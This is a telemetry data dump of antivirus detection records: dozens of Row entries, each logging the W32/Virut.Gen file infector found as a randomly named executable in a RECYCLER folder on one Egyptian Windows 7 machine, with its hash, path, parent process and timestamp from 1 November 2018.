  Row(detection=Row(filename='msyultks.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\MSYULTKS.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:01:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ikvbaksl.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\ikVbakSL.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:01:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='grmhlymo.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\GRMhlYMo.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:01:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vskxibfg.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\vskxIBfg.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:01:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='danyoytd.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\DANyoytD.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:01:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='nwsraevs.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\NWsRAeVS.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:01:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='twatdglt.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\TWaTDGLt.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flxcbodn.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\FLXcBoDn.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='uiqkgyyd.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\UiqKGYYd.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fgktgqhk.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\FGkTGQHK.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avlxsbdd.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\AvLxsBdd.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='srqqqzrd.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\srqqQZrd.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='uqmjdymh.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\uqmJdyMH.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='rcnpjjtj.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\rcnPJjTj.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dqyvqdff.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\dQyvqdff.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='hnugijbl.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\HnUgijBL.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='lnefmfmg.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\lnEFMFmg.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='qoizfldc.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\qOIZfLdc.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='roupzjdb.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\roUpZjDB.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='qbivnfuy.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\QBiVNfUy.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ntujmnye.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\NtuJMnye.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='nqcgmncz.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\nqcgmNCZ.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dfhkgexh.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\DfHKGeXh.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ggjlwmpb.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\ggjlWmpB.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fojtnnff.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\fOjtNNFF.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='iffofqqb.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\IfFOfqQb.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ojfjfxha.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\oJfJFXHA.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gdkslwfu.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\GdkSLwFu.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='txksfhek.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\tXKSfHek.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='kuhxreaa.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\kUhXReAA.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='qtzzkwst.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\QtZZkwsT.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vsbidcgc.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\vsbiDCGC.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='qppleesh.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\qPPLEEsH.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='rqauwqqe.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\rqAuWqQe.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bbsjyhef.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\BbSjyHef.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cjgjvlpo.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\cJGjvlPo.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='qeyahdan.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\QeyAhDAN.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='btbhsgzd.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\BtbhsgZd.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ybbsncqf.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\YbbSNcQF.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gbrybumc.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\gBrYbuMC.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='hgfqnxbl.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\hGFqNXbl.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='hjlmamfp.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\hjlMaMfP.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xkkdofnt.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\XkkDofNt.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='juiupnqg.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\jUiuPNQG.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fvjdqlks.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\FvjdQlKS.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tahgscek.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\tahGSceK.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ofbyfzmj.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\oFBYFZMJ.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pfnxftow.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\pFnxFTow.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gvfypehy.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\gVFYPeHY.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='eyzcneva.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\EYZCNevA.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yvnajkwr.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\yvnAJKwr.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='iycufpgl.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\IycUfpgL.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='whmwahby.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\whMwahBY.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:15Z'), dt=datetime.date(2018, 11, 1)),
